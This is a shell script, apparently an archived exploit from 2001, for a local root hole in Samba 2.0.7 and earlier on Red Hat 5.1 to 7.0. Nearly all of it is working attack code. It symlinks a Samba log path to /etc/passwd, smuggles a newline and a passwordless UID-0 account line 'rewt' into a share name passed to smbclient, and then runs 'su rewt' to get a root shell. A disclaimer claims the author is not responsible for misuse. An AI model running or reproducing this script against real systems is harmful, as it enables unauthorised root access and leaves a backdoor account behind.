Samba prior to v2.0.8 local root exploit. Tested against Red Hat 5.1 - 7.0.
3559da9478ef6e2ad5bec74cb1fb9c968334a18bfaaedcff07c6f53c7ef83ec8
#/bin/sh
#
# Samba <=2.0.7 xploit for RH 5.1-7.0
# by MostaraC(aka Snyggast) @2001, mail: yuggoboy@hotmail.com
# Tested on RH 7.0 with no updates
# Use it wisely and make the Net more secure
# Author is not responsible for any illegal usage of this script
#
# Knowledge is power, and power is knowledge.../by InformationHungry
# He starved to death coz he dossed own ISP ;)
# Latehours quick-shit for the needing ones ;)
# Next release will be a lynx-sploit, possibly remote
# C U @Defcon
echo "Samba <=2.0.7 xploit for RH 5.1-7.0"
echo " by Mostarac @2001"
echo
PROC=`/usr/bin/pstree |/bin/grep smbd`
CONF1="/etc/samba/smb.conf"
CONF2="/etc/smb.conf"
CONF3="/usr/local/etc/smb.conf"
echo "*** Checking for samba..."
if [ ! -z "$PROC" ]; then
echo " Samba is running. Excellent"
else
echo " Samba is NOT running. Exploiting system not possible"
echo " Exiting script...Goodbye"
exit 0
fi
echo "*** Checking possible configuration files..."
if [ -f "$CONF3" ]; then
CONF="$CONF3"
fi
if [ -f "$CONF2" ]; then
CONF="$CONF2"
fi
if [ -f "$CONF1" ]; then
CONF="$CONF1"
fi
if [ -z "$CONF" ]; then
echo " Didnt find smb.conf. Exploiting system not possible"
echo " Exiting script...Goodbye"
exit 0
else
echo " Config file exists at:" $CONF
fi
echo "*** Checking the log file for accurate defitinion..."
LOG1=`/bin/grep -i "log file =" /etc/samba/smb.conf`
LOG2=`/bin/grep -i "log file=" /etc/samba/smb.conf`
if [ ! -z "$LOG1" ]; then
LOG="$LOG1"
fi
if [ ! -z "$LOG2" ]; then
LOG="$LOG2"
fi
if [ ! -z "$LOG" ]; then
echo " Logfile definition found in smb.conf"
else
echo " No logfile defitnition."
echo " Exiting script...Goodbye"
exit 0
fi
echo "*** Exploiting the system..."
rm -rf /tmp/x.log
ln -s /etc/passwd /tmp/x.log
smbclient //localhost/"`perl -e '{print "\n\nrewt::0:0::/:/bin/sh\n"}'`" -n
../../../tmp/x -N
echo " Don't forget to clean /etc/passwd!"
echo " Resistance is futile, you all will be assimilated"
echo " Voila...Rootshell"
su rewt